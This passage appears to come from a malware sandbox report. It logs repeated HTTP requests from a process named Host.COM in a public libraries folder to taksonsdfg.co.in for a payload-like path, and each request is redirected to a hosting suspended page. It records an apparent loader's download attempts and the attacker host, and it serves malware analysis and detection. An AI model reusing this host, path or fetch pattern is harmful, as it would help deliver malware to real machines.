2024-11-26 08:39:21 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:39:21 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:39:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49910	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:23 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:23 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:39:23 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:23 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49916	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:25 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:25 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:39:25 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:25 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:39:25 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:39:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	49923	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:27 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:27 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:39:27 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:27 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	49928	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:29 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:29 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:39:29 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:29 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:39:29 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:39:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	49936	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:31 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:32 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:39:32 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:32 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	49941	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:33 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:34 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:39:34 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:34 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:39:34 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:39:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	49948	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:36 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:36 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:39:36 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:36 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	49952	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:37 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:38 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:39:38 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:38 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:39:38 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:39:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	49959	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:39:40 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:39:40 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:39:40 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:39:40 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 